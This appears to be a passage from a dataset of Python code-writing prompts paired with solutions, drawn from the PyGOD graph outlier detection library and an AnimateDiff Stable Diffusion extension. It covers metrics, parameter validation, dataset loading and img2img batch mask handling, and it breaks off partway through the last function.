The provided code snippet includes necessary dependencies for implementing the `eval_f1` function. Write a Python function `def eval_f1(label, pred)` to solve the following problem:
F1 score for binary classification. Parameters ---------- label : torch.Tensor Labels in shape of ``(N, )``, where 1 represents outliers, 0 represents normal instances. pred : torch.Tensor Outlier prediction in shape of ``(N, )``. Returns ------- f1 : float F1 score.
Here is the function:
def eval_f1(label, pred):
    """F1 score for binary outlier detection.

    Parameters
    ----------
    label : torch.Tensor
        Binary ground-truth labels of shape ``(N, )``; 1 marks outliers,
        0 marks normal instances.
    pred : torch.Tensor
        Binary outlier predictions of shape ``(N, )``.

    Returns
    -------
    f1 : float
        F1 score.
    """
    return f1_score(y_true=label, y_pred=pred)
3,806 |
The provided code snippet includes necessary dependencies for implementing the `to_edge_score` function. Write a Python function `def to_edge_score(score, edge_index)` to solve the following problem:
Convert outlier node score to outlier edge score by averaging the scores of two nodes connected by an edge. Parameters ---------- score : torch.Tensor The node score. edge_index : torch.Tensor The edge index. Returns ------- score : torch.Tensor The edge score.
Here is the function:
def to_edge_score(score, edge_index):
    """Derive edge-level outlier scores from node-level ones: each edge
    receives the mean of its two endpoint scores.

    Parameters
    ----------
    score : torch.Tensor
        Node-level outlier scores.
    edge_index : torch.Tensor
        Edge index of shape ``(2, E)``.

    Returns
    -------
    score : torch.Tensor
        Edge-level outlier scores of shape ``(E, )``.
    """
    src, dst = edge_index[0], edge_index[1]
    return (score[src] + score[dst]) / 2
3,807 |
The provided code snippet includes necessary dependencies for implementing the `to_graph_score` function. Write a Python function `def to_graph_score(score)` to solve the following problem:
Convert outlier node score to outlier graph score by averaging the scores of all nodes in a graph. Parameters ---------- score : torch.Tensor The node score. Returns ------- score : torch.Tensor The graph score.
Here is the function:
def to_graph_score(score):
    """Derive a graph-level outlier score from node-level ones by
    averaging over the last dimension.

    Parameters
    ----------
    score : torch.Tensor
        Node-level outlier scores.

    Returns
    -------
    score : torch.Tensor
        Graph-level outlier score.
    """
    graph_score = score.mean(dim=-1)
    return graph_score
3,808 | import os
import torch
import shutil
import numbers
import requests
import warnings
import numpy as np
from importlib import import_module
from ..metric import *
def check_parameter(param, low=MIN_INT, high=MAX_INT, param_name='',
                    include_left=False, include_right=False):
    """Check if an input is within the defined range.

    Parameters
    ----------
    param : int, float
        The input parameter to check.
    low : int, float
        The lower bound of the range.
    high : int, float
        The higher bound of the range.
    param_name : str, optional (default='')
        The name of the parameter.
    include_left : bool, optional (default=False)
        Whether includes the lower bound (lower bound <=).
    include_right : bool, optional (default=False)
        Whether includes the higher bound (<= higher bound).

    Returns
    -------
    within_range : bool or raise errors
        Whether the parameter is within the range of (low, high)
    """
    # param, low and high should all be numerical
    if not isinstance(param, (numbers.Integral, int, float)):
        # BUG FIX: original message ran the value and the explanation
        # together ("{param} Not numerical"); add the separating period
        raise TypeError('{param_name} is set to {param}. Not numerical'.format(
            param=param, param_name=param_name))
    if not isinstance(low, (numbers.Integral, int, float)):
        raise TypeError('low is set to {low}. Not numerical'.format(low=low))
    if not isinstance(high, (numbers.Integral, int, float)):
        raise TypeError('high is set to {high}. Not numerical'.format(
            high=high))
    # at least one of the bounds should be specified
    if low is MIN_INT and high is MAX_INT:
        # BUG FIX: original said "Neither low nor high bounds is undefined",
        # which states the opposite of the condition detected here
        raise ValueError('Neither low nor high bound is specified')
    # if wrong bound values are used
    if low > high:
        raise ValueError(
            'Lower bound > Higher bound')
    # value check under different bound conditions
    if (include_left and include_right) and (param < low or param > high):
        raise ValueError(
            '{param_name} is set to {param}. '
            'Not in the range of [{low}, {high}].'.format(
                param=param, low=low, high=high, param_name=param_name))
    elif (include_left and not include_right) and (
            param < low or param >= high):
        raise ValueError(
            '{param_name} is set to {param}. '
            'Not in the range of [{low}, {high}).'.format(
                param=param, low=low, high=high, param_name=param_name))
    elif (not include_left and include_right) and (
            param <= low or param > high):
        raise ValueError(
            '{param_name} is set to {param}. '
            'Not in the range of ({low}, {high}].'.format(
                param=param, low=low, high=high, param_name=param_name))
    elif (not include_left and not include_right) and (
            param <= low or param >= high):
        raise ValueError(
            '{param_name} is set to {param}. '
            'Not in the range of ({low}, {high}).'.format(
                param=param, low=low, high=high, param_name=param_name))
    else:
        return True
The provided code snippet includes necessary dependencies for implementing the `validate_device` function. Write a Python function `def validate_device(gpu_id)` to solve the following problem:
Validate the input GPU ID is valid on the given environment. If no GPU is presented, return 'cpu'. Parameters ---------- gpu_id : int GPU ID to check. Returns ------- device : str Valid device, e.g., 'cuda:0' or 'cpu'.
Here is the function:
def validate_device(gpu_id):
    """Validate the input GPU ID is valid on the given environment.
    If no GPU is presented, return 'cpu'.

    Parameters
    ----------
    gpu_id : int
        GPU ID to check. ``-1`` explicitly requests CPU.

    Returns
    -------
    device : str
        Valid device, e.g., 'cuda:0' or 'cpu'.
    """
    # cast to int for checking
    gpu_id = int(gpu_id)
    # if it is cpu
    if gpu_id == -1:
        return 'cpu'
    # if gpu is available
    if torch.cuda.is_available():
        # check if gpu id is between 0 and the total number of GPUs
        check_parameter(gpu_id, 0, torch.cuda.device_count(),
                        param_name='gpu id', include_left=True,
                        include_right=False)
        device = 'cuda:{}'.format(gpu_id)
    else:
        # BUG FIX: original guarded the warning with ``gpu_id != 'cpu'``,
        # but gpu_id was already cast to int above, so the comparison was
        # always True; a GPU was requested (gpu_id != -1), warn directly.
        warnings.warn('The cuda is not available. Set to cpu.')
        device = 'cpu'
    return device
3,809 | import os
import torch
import shutil
import numbers
import requests
import warnings
import numpy as np
from importlib import import_module
from ..metric import *
The provided code snippet includes necessary dependencies for implementing the `load_data` function. Write a Python function `def load_data(name, cache_dir=None)` to solve the following problem:
Data loading function. See `data repository <https://github.com/pygod-team/data>`_ for supported datasets. For injected/generated datasets, the labels meanings are as follows. - 0: inlier - 1: contextual outlier only - 2: structural outlier only - 3: both contextual outlier and structural outlier Parameters ---------- name : str The name of the dataset. cache_dir : str, optional The directory for dataset caching. Default: ``None``. Returns ------- data : torch_geometric.data.Data The outlier dataset. Examples -------- >>> from pygod.utils import load_data >>> data = load_data(name='weibo') # in PyG format >>> y = data.y.bool() # binary labels (inlier/outlier) >>> yc = data.y >> 0 & 1 # contextual outliers >>> ys = data.y >> 1 & 1 # structural outliers
Here is the function:
def load_data(name, cache_dir=None):
    """Load a PyGOD benchmark dataset, downloading it on first use. See
    the `data repository <https://github.com/pygod-team/data>`_ for
    supported datasets.
    For injected/generated datasets, the label meanings are as follows.
    - 0: inlier
    - 1: contextual outlier only
    - 2: structural outlier only
    - 3: both contextual outlier and structural outlier

    Parameters
    ----------
    name : str
        The name of the dataset.
    cache_dir : str, optional
        The directory for dataset caching.
        Default: ``None``.

    Returns
    -------
    data : torch_geometric.data.Data
        The outlier dataset.

    Examples
    --------
    >>> from pygod.utils import load_data
    >>> data = load_data(name='weibo')  # in PyG format
    >>> y = data.y.bool()    # binary labels (inlier/outlier)
    >>> yc = data.y >> 0 & 1  # contextual outliers
    >>> ys = data.y >> 1 & 1  # structural outliers
    """
    if cache_dir is None:
        cache_dir = os.path.join(os.path.expanduser('~'), '.pygod/data')
    file_path = os.path.join(cache_dir, name + '.pt')
    if not os.path.exists(file_path):
        # dataset not cached yet: fetch the zipped archive and unpack it
        zip_path = os.path.join(cache_dir, name + '.pt.zip')
        url = "https://github.com/pygod-team/data/raw/main/" + name + ".pt.zip"
        if not os.path.exists(cache_dir):
            os.makedirs(cache_dir)
        resp = requests.get(url, stream=True)
        if resp.status_code != 200:
            raise RuntimeError("Failed downloading url %s" % url)
        with open(zip_path, 'wb') as f:
            for chunk in resp.iter_content(chunk_size=1024):
                if chunk:  # filter out keep-alive new chunks
                    f.write(chunk)
        shutil.unpack_archive(zip_path, cache_dir)
    # NOTE(review): torch.load unpickles arbitrary objects; the archive is
    # assumed trusted since it comes from the pygod-team GitHub repository.
    return torch.load(file_path)
3,810 | import os
import torch
import shutil
import numbers
import requests
import warnings
import numpy as np
from importlib import import_module
from ..metric import *
The provided code snippet includes necessary dependencies for implementing the `logger` function. Write a Python function `def logger(epoch=0, loss=0, score=None, target=None, time=None, verbose=0, train=True, deep=True)` to solve the following problem:
Logger for detector. Parameters ---------- epoch : int, optional The current epoch. loss : float, optional The current epoch loss value. score : torch.Tensor, optional The current outlier scores. target : torch.Tensor, optional The ground truth labels. time : float, optional The current epoch time. verbose : int, optional Verbosity mode. Range in [0, 3]. Larger value for printing out more log information. Default: ``0``. train : bool, optional Whether the logger is used for training. deep : bool, optional Whether the logger is used for deep detector.
Here is the function:
def logger(epoch=0,
           loss=0,
           score=None,
           target=None,
           time=None,
           verbose=0,
           train=True,
           deep=True):
    """
    Print a one-line progress report for a detector.

    Parameters
    ----------
    epoch : int, optional
        The current epoch.
    loss : float or tuple, optional
        The current epoch loss value; a 2-tuple prints two loss columns.
    score : torch.Tensor, optional
        The current outlier scores.
    target : torch.Tensor, optional
        The ground truth labels.
    time : float, optional
        The current epoch time.
    verbose : int, optional
        Verbosity mode. Range in [0, 3]. Larger value for printing out
        more log information. Default: ``0``.
    train : bool, optional
        Whether the logger is used for training.
    deep : bool, optional
        Whether the logger is used for deep detector.
    """
    if verbose <= 0:
        return
    if deep:
        # prefix with the epoch number during training, "Test:" otherwise
        print("Epoch {:04d}: ".format(epoch) if train else "Test: ", end='')
        if isinstance(loss, tuple):
            print("Loss I {:.4f} | Loss O {:.4f} | "
                  .format(loss[0], loss[1]), end='')
        else:
            print("Loss {:.4f} | ".format(loss), end='')
    if verbose > 1 and target is not None:
        print("AUC {:.4f}".format(eval_roc_auc(target, score)), end='')
        if verbose > 2:
            top_k = target.nonzero().size(0)
            recall = eval_recall_at_k(target, score, top_k)
            precision = eval_precision_at_k(target, score, top_k)
            avg_precision = eval_average_precision(target, score)
            # threshold scores at the contamination percentile to get
            # binary predictions for F1
            contamination = sum(target) / len(target)
            cutoff = np.percentile(score, 100 * (1 - contamination))
            f1 = eval_f1(target, (score > cutoff).long())
            print(" | Recall {:.4f} | Precision {:.4f} "
                  "| AP {:.4f} | F1 {:.4f}"
                  .format(recall, precision, avg_precision, f1), end='')
    if time is not None:
        print(" | Time {:.2f}".format(time), end='')
    print()
3,811 | import os
import torch
import shutil
import numbers
import requests
import warnings
import numpy as np
from importlib import import_module
from ..metric import *
The provided code snippet includes necessary dependencies for implementing the `init_detector` function. Write a Python function `def init_detector(name, **kwargs)` to solve the following problem:
Detector initialization function.
Here is the function:
def init_detector(name, **kwargs):
    """
    Detector initialization function.

    Looks up ``name`` in ``pygod.detector.__all__`` and instantiates the
    matching detector class with ``**kwargs``.
    """
    detector_module = import_module('pygod.detector')
    assert name in detector_module.__all__, f"Detector {name} not found"
    detector_cls = getattr(detector_module, name)
    return detector_cls(**kwargs)
3,812 | import os
import torch
import shutil
import numbers
import requests
import warnings
import numpy as np
from importlib import import_module
from ..metric import *
The provided code snippet includes necessary dependencies for implementing the `init_nn` function. Write a Python function `def init_nn(name, **kwargs)` to solve the following problem:
Neural network initialization function.
Here is the function:
def init_nn(name, **kwargs):
    """
    Neural network initialization function.

    Looks up ``name`` in ``pygod.nn.__all__`` and instantiates the
    matching backbone class with ``**kwargs``.
    """
    nn_module = import_module('pygod.nn')
    assert name in nn_module.__all__, f"Neural network {name} not found"
    nn_cls = getattr(nn_module, name)
    return nn_cls(**kwargs)
3,813 | import os
import torch
import shutil
import numbers
import requests
import warnings
import numpy as np
from importlib import import_module
from ..metric import *
The provided code snippet includes necessary dependencies for implementing the `pprint` function. Write a Python function `def pprint(params, offset=0, printer=repr)` to solve the following problem:
Pretty print the dictionary 'params' Parameters ---------- params : dict The dictionary to pretty print offset : int, optional The offset at the beginning of each line. printer : callable, optional The function to convert entries to strings, typically the builtin str or repr.
Here is the function:
def pprint(params, offset=0, printer=repr):
    """Pretty print the dictionary 'params'

    Entries are sorted by key, rendered as ``key=value``, and wrapped onto
    a new (indented) line when the current line would reach 75 columns.

    Parameters
    ----------
    params : dict
        The dictionary to pretty print
    offset : int, optional
        The offset at the beginning of each line.
    printer : callable, optional
        The function to convert entries to strings, typically
        the builtin str or repr.
    """
    separator = ',\n' + ' ' * (offset + 1)
    pieces = []
    width = offset
    for index, (key, value) in enumerate(sorted(params.items())):
        # floats go through str() for a representation that is stable
        # across platforms; everything else uses `printer`
        if type(value) is float:
            entry = '%s=%s' % (key, str(value))
        else:
            entry = '%s=%s' % (key, printer(value))
        # truncate pathologically long entries, keeping head and tail
        if len(entry) > 500:
            entry = entry[:300] + '...' + entry[-100:]
        if index > 0:
            if width + len(entry) >= 75 or '\n' in entry:
                pieces.append(separator)
                width = len(separator)
            else:
                pieces.append(', ')
                width += 2
        pieces.append(entry)
        width += len(entry)
    joined = ''.join(pieces)
    # strip trailing spaces so doctests stay clean
    return '\n'.join(line.rstrip(' ') for line in joined.split('\n'))
3,814 | import os
import torch
import shutil
import numbers
import requests
import warnings
import numpy as np
from importlib import import_module
from ..metric import *
The provided code snippet includes necessary dependencies for implementing the `is_fitted` function. Write a Python function `def is_fitted(detector, attributes=None)` to solve the following problem:
Check if the detector is fitted. Parameters ---------- detector : pygod.detector.Detector The detector to check. attributes : list, optional The attributes to check. Default: ``None``. Returns ------- is_fitted : bool Whether the detector is fitted.
Here is the function:
def is_fitted(detector, attributes=None):
    """
    Check if the detector is fitted.

    Parameters
    ----------
    detector : pygod.detector.Detector
        The detector to check.
    attributes : list, optional
        The attribute names that must be present and non-None on a
        fitted detector. Default: ``None`` (checks ``['model']``).

    Raises
    ------
    AssertionError
        If any checked attribute is missing or ``None``, i.e. the
        detector has not been fitted yet. Returns ``None`` otherwise.
    """
    if attributes is None:
        attributes = ['model']
    # getattr with a None default covers both "attribute missing" and
    # "attribute set to None" in one safe lookup (no eval of attr names)
    assert all(getattr(detector, attr, None) is not None
               for attr in attributes), \
        "The detector is not fitted yet"
3,815 | from random import choice
from pygod.detector import *
from pyod.models.lof import LOF
from torch_geometric.nn import MLP
from sklearn.ensemble import IsolationForest
def init_model(args):
    """
    Build a detector instance for benchmarking, with hyperparameters
    sampled at random from per-dataset search spaces.

    Parameters
    ----------
    args : argparse.Namespace
        Parsed CLI arguments. Reads ``args.dataset``, ``args.model``,
        ``args.gpu`` and, when present, ``args.epoch``.

    Returns
    -------
    object
        A PyGOD detector, a PyOD ``LOF``, or a scikit-learn
        ``IsolationForest``, depending on ``args.model``. Returns
        ``None`` for an unrecognized model name.
    """
    # candidate pools; `choice` draws one value per call, so repeated
    # calls yield different random configurations
    dropout = [0, 0.1, 0.3]
    lr = [0.1, 0.05, 0.01]
    weight_decay = 0.01
    if args.dataset == 'inj_flickr' or args.dataset == 'dgraph':
        # sampling and minibatch training on large dataset flickr
        batch_size = 64
        num_neigh = 3
        epoch = 2
    else:
        # batch_size=0 / num_neigh=-1 request full-batch, full-neighborhood
        # training in PyGOD — TODO confirm against pygod detector docs
        batch_size = 0
        num_neigh = -1
        epoch = 300
    model_name = args.model
    gpu = args.gpu
    # an explicit --epoch flag overrides the per-dataset default above
    if hasattr(args, 'epoch'):
        epoch = args.epoch
    if args.dataset == 'reddit':
        # for the low feature dimension dataset
        hid_dim = [32, 48, 64]
    elif args.dataset in ['enron', 'disney', 'dgraph', 'books']:
        hid_dim = [8, 12, 16]
    else:
        hid_dim = [32, 64, 128, 256]
    alpha = [0.8, 0.5, 0.2]
    if model_name == "adone":
        return AdONE(hid_dim=choice(hid_dim),
                     weight_decay=weight_decay,
                     dropout=choice(dropout),
                     lr=choice(lr),
                     epoch=epoch,
                     gpu=gpu,
                     batch_size=batch_size,
                     num_neigh=num_neigh)
    elif model_name == 'anomalydae':
        # embedding and output dims are tied to the same sampled value
        hd = choice(hid_dim)
        return AnomalyDAE(embed_dim=hd,
                          out_dim=hd,
                          weight_decay=weight_decay,
                          dropout=choice(dropout),
                          theta=choice([10., 40., 90.]),
                          eta=choice([3., 5., 8.]),
                          lr=choice(lr),
                          epoch=epoch,
                          gpu=gpu,
                          alpha=choice(alpha),
                          batch_size=batch_size,
                          num_neigh=num_neigh)
    elif model_name == 'conad':
        return CONAD(hid_dim=choice(hid_dim),
                     weight_decay=weight_decay,
                     dropout=choice(dropout),
                     lr=choice(lr),
                     epoch=epoch,
                     gpu=gpu,
                     weight=choice(alpha),
                     batch_size=batch_size,
                     num_neigh=num_neigh)
    elif model_name == 'dominant':
        return DOMINANT(hid_dim=choice(hid_dim),
                        weight_decay=weight_decay,
                        dropout=choice(dropout),
                        lr=choice(lr),
                        epoch=epoch,
                        gpu=gpu,
                        weight=choice(alpha),
                        batch_size=batch_size,
                        num_neigh=num_neigh)
    elif model_name == 'done':
        return DONE(hid_dim=choice(hid_dim),
                    weight_decay=weight_decay,
                    dropout=choice(dropout),
                    lr=choice(lr),
                    epoch=epoch,
                    gpu=gpu,
                    batch_size=batch_size,
                    num_neigh=num_neigh)
    elif model_name == 'gaan':
        return GAAN(noise_dim=choice([8, 16, 32]),
                    hid_dim=choice(hid_dim),
                    weight_decay=weight_decay,
                    dropout=choice(dropout),
                    lr=choice(lr),
                    epoch=epoch,
                    gpu=gpu,
                    weight=choice(alpha),
                    batch_size=batch_size,
                    num_neigh=num_neigh)
    elif model_name == 'gcnae':
        return GAE(hid_dim=choice(hid_dim),
                   weight_decay=weight_decay,
                   dropout=choice(dropout),
                   lr=choice(lr),
                   epoch=epoch,
                   gpu=gpu,
                   batch_size=batch_size,
                   num_neigh=num_neigh)
    elif model_name == 'guide':
        return GUIDE(a_hid=choice(hid_dim),
                     s_hid=choice([4, 5, 6]),
                     weight_decay=weight_decay,
                     dropout=choice(dropout),
                     lr=choice(lr),
                     epoch=epoch,
                     gpu=gpu,
                     alpha=choice(alpha),
                     batch_size=batch_size,
                     num_neigh=num_neigh,
                     cache_dir='./tmp')
    elif model_name == "mlpae":
        # GAE with an MLP backbone, i.e. a plain (non-graph) autoencoder
        return GAE(hid_dim=choice(hid_dim),
                   weight_decay=weight_decay,
                   dropout=choice(dropout),
                   lr=choice(lr),
                   epoch=epoch,
                   gpu=gpu,
                   batch_size=batch_size,
                   backbone=MLP)
    elif model_name == 'lof':
        return LOF()
    elif model_name == 'if':
        return IsolationForest()
    elif model_name == 'radar':
        return Radar(lr=choice(lr), gpu=gpu)
    elif model_name == 'anomalous':
        return ANOMALOUS(lr=choice(lr), gpu=gpu)
    elif model_name == 'scan':
        return SCAN(eps=choice([0.3, 0.5, 0.8]), mu=choice([2, 5, 10]))
    # NOTE(review): falls through and returns None for unknown model names
3,816 | from enum import Enum
from typing import Optional
import math
import torch
from torch import nn
from einops import rearrange
import torch.nn as disable_weight_init
from ldm.modules.attention import FeedForward
def zero_module(module):
    """Reset every parameter of *module* to zero in-place and return it."""
    for param in module.parameters():
        # detach first so zeroing is not recorded in the autograd graph
        param.detach().zero_()
    return module
3,817 | from pathlib import Path
from types import MethodType
import os
import cv2
import numpy as np
import torch
import hashlib
from PIL import Image, ImageOps, UnidentifiedImageError
from modules import processing, shared, scripts, devices, masking, sd_samplers, images
from modules.processing import (StableDiffusionProcessingImg2Img,
process_images,
create_binary_mask,
create_random_tensors,
images_tensor_to_samples,
setup_color_correction,
opt_f)
from modules.shared import opts
from modules.sd_samplers_common import images_tensor_to_samples, approximation_indexes
from modules.sd_models import get_closet_checkpoint_match
from scripts.animatediff_logger import logger_animatediff as logger
from scripts.animatediff_utils import get_animatediff_arg, get_controlnet_units
def animatediff_i2i_init(self, all_prompts, all_seeds, all_subseeds): # only hack this when i2i-batch with batch mask
    """
    Replacement for ``StableDiffusionProcessingImg2Img.init`` used when an
    img2img batch supplies one inpaint mask per frame: ``self.image_mask``
    is a *list* of masks here, and each init image is paired with the mask
    of the same index. Otherwise mirrors the upstream webui implementation.
    """
    self.extra_generation_params["Denoising strength"] = self.denoising_strength
    # image_cfg_scale is only meaningful for instruct-pix2pix ("edit") models
    self.image_cfg_scale: float = self.image_cfg_scale if shared.sd_model.cond_stage_key == "edit" else None
    self.sampler = sd_samplers.create_sampler(self.sampler_name, self.sd_model)
    crop_regions = []
    paste_to = []
    masks_for_overlay = []
    image_masks = self.image_mask
    for idx, image_mask in enumerate(image_masks):
        # image_mask is passed in as RGBA by Gradio to support alpha masks,
        # but we still want to support binary masks.
        image_mask = create_binary_mask(image_mask)
        if self.inpainting_mask_invert:
            image_mask = ImageOps.invert(image_mask)
        # directional Gaussian blur of the mask edges (x pass, then y pass)
        if self.mask_blur_x > 0:
            np_mask = np.array(image_mask)
            kernel_size = 2 * int(2.5 * self.mask_blur_x + 0.5) + 1
            np_mask = cv2.GaussianBlur(np_mask, (kernel_size, 1), self.mask_blur_x)
            image_mask = Image.fromarray(np_mask)
        if self.mask_blur_y > 0:
            np_mask = np.array(image_mask)
            kernel_size = 2 * int(2.5 * self.mask_blur_y + 0.5) + 1
            np_mask = cv2.GaussianBlur(np_mask, (1, kernel_size), self.mask_blur_y)
            image_mask = Image.fromarray(np_mask)
        if self.inpaint_full_res:
            # "inpaint at full resolution": crop around the masked region,
            # upscale it, and remember where to paste the result back
            masks_for_overlay.append(image_mask)
            mask = image_mask.convert('L')
            crop_region = masking.get_crop_region(np.array(mask), self.inpaint_full_res_padding)
            crop_region = masking.expand_crop_region(crop_region, self.width, self.height, mask.width, mask.height)
            crop_regions.append(crop_region)
            x1, y1, x2, y2 = crop_region
            mask = mask.crop(crop_region)
            image_mask = images.resize_image(2, mask, self.width, self.height)
            paste_to.append((x1, y1, x2-x1, y2-y1))
        else:
            image_mask = images.resize_image(self.resize_mode, image_mask, self.width, self.height)
            np_mask = np.array(image_mask)
            np_mask = np.clip((np_mask.astype(np.float32)) * 2, 0, 255).astype(np.uint8)
            masks_for_overlay.append(Image.fromarray(np_mask))
        image_masks[idx] = image_mask
    self.mask_for_overlay = masks_for_overlay[0] # only for saving purpose
    if paste_to:
        # webui only knows about one paste target; keep the full per-frame
        # list on a private attribute for AnimateDiff's own postprocessing
        self.paste_to = paste_to[0]
        self._animatediff_paste_to_full = paste_to
    self.overlay_images = []
    add_color_corrections = opts.img2img_color_correction and self.color_corrections is None
    if add_color_corrections:
        self.color_corrections = []
    imgs = []
    for idx, img in enumerate(self.init_images):
        # per-frame latent mask: explicit latent_mask (scalar or list) wins,
        # otherwise fall back to the frame's image mask
        latent_mask = (self.latent_mask[idx] if isinstance(self.latent_mask, list) else self.latent_mask) if self.latent_mask is not None else image_masks[idx]
        # Save init image
        if opts.save_init_img:
            self.init_img_hash = hashlib.md5(img.tobytes()).hexdigest()
            images.save_image(img, path=opts.outdir_init_images, basename=None, forced_filename=self.init_img_hash, save_to_dirs=False)
        image = images.flatten(img, opts.img2img_background_color)
        if not crop_regions and self.resize_mode != 3:
            image = images.resize_image(self.resize_mode, image, self.width, self.height)
        if image_masks:
            image_masked = Image.new('RGBa', (image.width, image.height))
            image_masked.paste(image.convert("RGBA").convert("RGBa"), mask=ImageOps.invert(masks_for_overlay[idx].convert('L')))
            self.overlay_images.append(image_masked.convert('RGBA'))
        # crop_region is not None if we are doing inpaint full res
        if crop_regions:
            image = image.crop(crop_regions[idx])
            image = images.resize_image(2, image, self.width, self.height)
        if image_masks:
            if self.inpainting_fill != 1:
                image = masking.fill(image, latent_mask)
        if add_color_corrections:
            self.color_corrections.append(setup_color_correction(image))
        # HWC uint8 -> CHW float32 in [0, 1]
        image = np.array(image).astype(np.float32) / 255.0
        image = np.moveaxis(image, 2, 0)
        imgs.append(image)
    if len(imgs) == 1:
        # a single frame is broadcast to the whole batch
        batch_images = np.expand_dims(imgs[0], axis=0).repeat(self.batch_size, axis=0)
        if self.overlay_images is not None:
            self.overlay_images = self.overlay_images * self.batch_size
        if self.color_corrections is not None and len(self.color_corrections) == 1:
            self.color_corrections = self.color_corrections * self.batch_size
    elif len(imgs) <= self.batch_size:
        self.batch_size = len(imgs)
        batch_images = np.array(imgs)
    else:
        raise RuntimeError(f"bad number of images passed: {len(imgs)}; expecting {self.batch_size} or less")
    image = torch.from_numpy(batch_images)
    image = image.to(shared.device, dtype=devices.dtype_vae)
    if opts.sd_vae_encode_method != 'Full':
        self.extra_generation_params['VAE Encoder'] = opts.sd_vae_encode_method
    self.init_latent = images_tensor_to_samples(image, approximation_indexes.get(opts.sd_vae_encode_method), self.sd_model)
    devices.torch_gc()
    if self.resize_mode == 3:
        # resize_mode 3 = "resize in latent space"
        self.init_latent = torch.nn.functional.interpolate(self.init_latent, size=(self.height // opt_f, self.width // opt_f), mode="bilinear")
    if image_masks is not None:
        def process_letmask(init_mask):
            # downscale a PIL mask to latent resolution, binarize it, and
            # repeat it across the 4 latent channels
            latmask = init_mask.convert('RGB').resize((self.init_latent.shape[3], self.init_latent.shape[2]))
            latmask = np.moveaxis(np.array(latmask, dtype=np.float32), 2, 0) / 255
            latmask = latmask[0]
            latmask = np.around(latmask)
            return np.tile(latmask[None], (4, 1, 1))
        if self.latent_mask is not None and not isinstance(self.latent_mask, list):
            latmask = process_letmask(self.latent_mask)
        else:
            if isinstance(self.latent_mask, list):
                latmask = [process_letmask(x) for x in self.latent_mask]
            else:
                latmask = [process_letmask(x) for x in image_masks]
            latmask = np.stack(latmask, axis=0)
        self.mask = torch.asarray(1.0 - latmask).to(shared.device).type(self.sd_model.dtype)
        self.nmask = torch.asarray(latmask).to(shared.device).type(self.sd_model.dtype)
        # this needs to be fixed to be done in sample() using actual seeds for batches
        if self.inpainting_fill == 2:
            # inpainting_fill 2 = fill masked area with latent noise
            self.init_latent = self.init_latent * self.mask + create_random_tensors(self.init_latent.shape[1:], all_seeds[0:self.init_latent.shape[0]]) * self.nmask
        elif self.inpainting_fill == 3:
            # inpainting_fill 3 = fill masked area with latent zeros
            self.init_latent = self.init_latent * self.mask
    self.image_conditioning = self.img2img_image_conditioning(image * 2 - 1, self.init_latent, image_masks) # let's ignore this image_masks which is related to inpaint model with different arch
def get_animatediff_arg(p: StableDiffusionProcessing):
    """
    Get AnimateDiff argument from `p`. If it's a dict, convert it to
    AnimateDiffProcess (and write the converted object back into
    `p.script_args`).
    """
    if not p.scripts:
        return None
    for script in p.scripts.alwayson_scripts:
        if script.title().lower() != "animatediff":
            continue
        arg = p.script_args[script.args_from]
        if isinstance(arg, dict):
            from scripts.animatediff_ui import AnimateDiffProcess
            arg = AnimateDiffProcess(**arg)
            p.script_args[script.args_from] = arg
        return arg
    return None
def get_controlnet_units(p: StableDiffusionProcessing):
    """
    Get controlnet arguments from `p`, keeping only the enabled units.
    """
    if not p.scripts:
        return []
    for script in p.scripts.alwayson_scripts:
        if script.title().lower() == "controlnet":
            units = p.script_args[script.args_from:script.args_to]
            return [unit for unit in units if unit.enabled]
    return []
def animatediff_i2i_batch(
        p: StableDiffusionProcessingImg2Img, input_dir: str, output_dir: str, inpaint_mask_dir: str,
        args, to_scale=False, scale_by=1.0, use_png_info=False, png_info_props=None, png_info_dir=None):
    """
    Replacement for the webui img2img batch loop when AnimateDiff is enabled:
    instead of generating one image per input file, it collects every frame
    in `input_dir` (and optionally one mask per frame from
    `inpaint_mask_dir`) into a single processing call that produces a video.

    Returns the `Processed` result from `process_images`, truncated to
    `img2img_batch_show_results_limit` if that option is set.
    """
    ad_params = get_animatediff_arg(p)
    assert ad_params.enable, "AnimateDiff is not enabled."
    # the input frame directory doubles as the AnimateDiff video source
    if not ad_params.video_path and not ad_params.video_source:
        ad_params.video_path = input_dir
    output_dir = output_dir.strip()
    processing.fix_seed(p)
    images = list(shared.walk_files(input_dir, allowed_extensions=(".png", ".jpg", ".jpeg", ".webp", ".tif", ".tiff")))
    is_inpaint_batch = False
    if inpaint_mask_dir:
        inpaint_masks = shared.listfiles(inpaint_mask_dir)
        is_inpaint_batch = bool(inpaint_masks)
        if is_inpaint_batch:
            assert len(inpaint_masks) == 1 or len(inpaint_masks) == len(images), 'The number of masks must be 1 or equal to the number of images.'
            logger.info(f"[i2i batch] Inpaint batch is enabled. {len(inpaint_masks)} masks found.")
            if len(inpaint_masks) > 1: # batch mask
                # per-frame masks need the patched init (see animatediff_i2i_init)
                p.init = MethodType(animatediff_i2i_init, p)
    cn_units = get_controlnet_units(p)
    for idx, cn_unit in enumerate(cn_units):
        # batch path broadcast
        if (cn_unit.input_mode.name == 'SIMPLE' and cn_unit.image is None) or \
                (cn_unit.input_mode.name == 'BATCH' and not cn_unit.batch_images) or \
                (cn_unit.input_mode.name == 'MERGE' and not cn_unit.batch_input_gallery):
            cn_unit.input_mode = cn_unit.input_mode.__class__.BATCH
            if "inpaint" in cn_unit.module:
                cn_unit.batch_images = f"{cn_unit.batch_images}\nmask:{inpaint_mask_dir}"
                logger.info(f"ControlNetUnit-{idx} is an inpaint unit without cond_hint specification. We have set batch_images = {cn_unit.batch_images}.")
    logger.info(f"[i2i batch] Will process {len(images)} images, creating {p.n_iter} new videos.")
    # extract "default" params to use in case getting png info fails
    prompt = p.prompt
    negative_prompt = p.negative_prompt
    seed = p.seed
    cfg_scale = p.cfg_scale
    sampler_name = p.sampler_name
    steps = p.steps
    override_settings = p.override_settings
    sd_model_checkpoint_override = get_closet_checkpoint_match(override_settings.get("sd_model_checkpoint", None))
    batch_results = None
    discard_further_results = False
    frame_images = []
    frame_masks = []
    # first pass: load every frame (and its mask) into memory
    for i, image in enumerate(images):
        try:
            img = Image.open(image)
        except UnidentifiedImageError as e:
            print(e)
            continue
        # Use the EXIF orientation of photos taken by smartphones.
        img = ImageOps.exif_transpose(img)
        if to_scale:
            p.width = int(img.width * scale_by)
            p.height = int(img.height * scale_by)
        frame_images.append(img)
        image_path = Path(image)
        if is_inpaint_batch:
            if len(inpaint_masks) == 1:
                mask_image_path = inpaint_masks[0]
                p.image_mask = Image.open(mask_image_path)
            else:
                # try to find corresponding mask for an image using index matching
                mask_image_path = inpaint_masks[i]
                frame_masks.append(Image.open(mask_image_path))
